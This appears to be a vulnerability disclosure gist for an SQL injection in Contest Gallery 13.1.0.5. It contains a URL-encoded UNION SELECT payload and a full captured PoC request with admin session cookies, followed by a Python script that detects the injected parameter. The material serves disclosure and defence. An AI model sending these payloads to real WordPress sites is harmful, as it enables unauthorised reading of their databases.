@tpmiller87
Created October 27, 2021 02:24
Contest Gallery 13.1.0.5 SQL injection
In Contest Gallery version 13.1.0.5, an SQL injection vulnerability exists in the user data export. The export is reached by navigating to "Edit gallery > Users Management > Export Users Data"; the "cg-search-user-name-original" parameter of that request is not sanitized properly, allowing SQL injection.
An example payload that reveals the target's database version (via VERSION()):
%27%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x717a6b7871%2CIFNULL%28CAST%28VERSION%28%29%20AS%20NCHAR%29%2C0x20%29%2C0x716b707871%29%2CNULL--%20-
PoC (captured request):
POST /wp-admin/admin.php?page=contest-gallery/index.php&users_management=true&option_id=1 HTTP/1.1
Host: 172.16.11.129
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://172.16.11.129/wp-admin/admin.php?page=contest-gallery%2Findex.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 318
Origin: http://172.16.11.129
Connection: close
Cookie: wordpress_645ea7237dc6755739a03b4455ae6c84=admin%7C1635445738%7CxypGymRlWrsbkVJOycKXrg6nQUSmSoEAPdKXhXtimZz%7C51459f3bc62cef4c77ed5b6eec3b8a3206455571db5d4f9d9639fff872bb419d; __wpdm_client=cfd314b95620d7774c7a871eed8b3bbb; wp-settings-1=libraryContent%3Dbrowse%26editor%3Dtinymce; wp-settings-time-1=1635273846; __utma=115262919.1935608114.1635126281.1635126281.1635126281.1; __utmz=115262919.1635126281.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wordpress_test_cookie=WP%20Cookie%20check; PHPSESSID=ov80k0rg7niu38l6ovdk57d3oq; wordpress_logged_in_645ea7237dc6755739a03b4455ae6c84=admin%7C1635445738%7CxypGymRlWrsbkVJOycKXrg6nQUSmSoEAPdKXhXtimZz%7C9fbda8829a9f2412f94c97048e80167d57764a24a8d472ce25a8e6d2d523c1a9
Upgrade-Insecure-Requests: 1
cg-search-user-name=&cg-search-user-name-original=%27%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x717a6b7871%2CIFNULL%28CAST%28VERSION%28%29%20AS%20NCHAR%29%2C0x20%29%2C0x716b707871%29%2CNULL--%20-&cg_create_user_data_csv_new_export=true&cg-search-gallery-id-original=&cg-search-gallery-id=&cg_create_user_data_csv=true
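As an added example (not part of the gist and not the plugin's own code), the script below decodes the form body of the PoC request above and applies a handful of structural checks that a WAF rule or a log-review script could use to flag the injected parameter during detection or incident response. The benign request body, the signature names and the `inspect_*` helper names are constructed for illustration.

```python
from __future__ import annotations

import re
from urllib.parse import parse_qs, unquote_plus

# Form body taken from the published PoC request above (advisory text, not constructed).
POC_BODY = (
    "cg-search-user-name=&cg-search-user-name-original=%27%20UNION%20ALL%20SELECT%20NULL"
    "%2CCONCAT%280x717a6b7871%2CIFNULL%28CAST%28VERSION%28%29%20AS%20NCHAR%29%2C0x20%29"
    "%2C0x716b707871%29%2CNULL--%20-&cg_create_user_data_csv_new_export=true"
    "&cg-search-gallery-id-original=&cg-search-gallery-id=&cg_create_user_data_csv=true"
)

# Constructed benign export request using the same field names, for comparison.
BENIGN_BODY = (
    "cg-search-user-name=alice&cg-search-user-name-original=alice"
    "&cg_create_user_data_csv_new_export=true&cg-search-gallery-id-original=1"
    "&cg-search-gallery-id=1&cg_create_user_data_csv=true"
)

# Signature names are our own labels. The patterns target the structure of the
# UNION-based payload in the advisory (quote break, UNION ... SELECT, hex string
# literals, trailing comment), not any one literal string.
SIGNATURES = {
    "union_select": re.compile(r"\bunion\b(?:\s+(?:all|distinct))?\s+select\b"),
    "comment_terminator": re.compile(r"--\s|#|/\*"),
    "quote_then_keyword": re.compile(r"'\s*(?:union|select|or|and)\b"),
    "hex_literal": re.compile(r"\b0x[0-9a-f]{2,}\b"),
}


def normalise(value: str) -> str:
    """Undo repeated percent-encoding, replace /* */ comments (used as whitespace)
    with a space, collapse whitespace and lowercase, so the signatures see one form."""
    previous = None
    while previous != value:
        previous, value = value, unquote_plus(value)
    value = re.sub(r"/\*.*?\*/", " ", value)
    return re.sub(r"\s+", " ", value).strip().lower()


def inspect_value(value: str) -> list[str]:
    """Return the names of all signatures matched by one parameter value."""
    hits: list[str] = []
    if re.search(r"/\*.*?\*/", value):
        hits.append("inline_comment")  # recorded before normalise() strips it
    normalised = normalise(value)
    hits.extend(name for name, pattern in SIGNATURES.items() if pattern.search(normalised))
    return hits


def inspect_body(body: str) -> dict[str, list[str]]:
    """Map each parameter in an x-www-form-urlencoded body to the signatures it triggered."""
    findings: dict[str, list[str]] = {}
    for name, values in parse_qs(body, keep_blank_values=True).items():
        for value in values:
            hits = inspect_value(value)
            if hits:
                findings.setdefault(name, []).extend(hits)
    return findings


def decoded_parameter(body: str, name: str) -> str:
    """Return the first decoded value of a parameter, for analyst review."""
    return parse_qs(body, keep_blank_values=True).get(name, [""])[0]


if __name__ == "__main__":
    for label, body in (("PoC", POC_BODY), ("benign", BENIGN_BODY)):
        print(label, inspect_body(body))
    print(decoded_parameter(POC_BODY, "cg-search-user-name-original"))
```

Run against the PoC body, `inspect_body` reports only `cg-search-user-name-original`, with all four signatures firing; the benign body produces no findings. The `#` and `/*` patterns will match legitimate search strings that happen to contain those characters, so in production they should be scoped to the parameters that reach the export query rather than applied to every field.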
@tpmiller87 (Author) attached two screenshots: [image: export_button], [image: intercepted_sqli]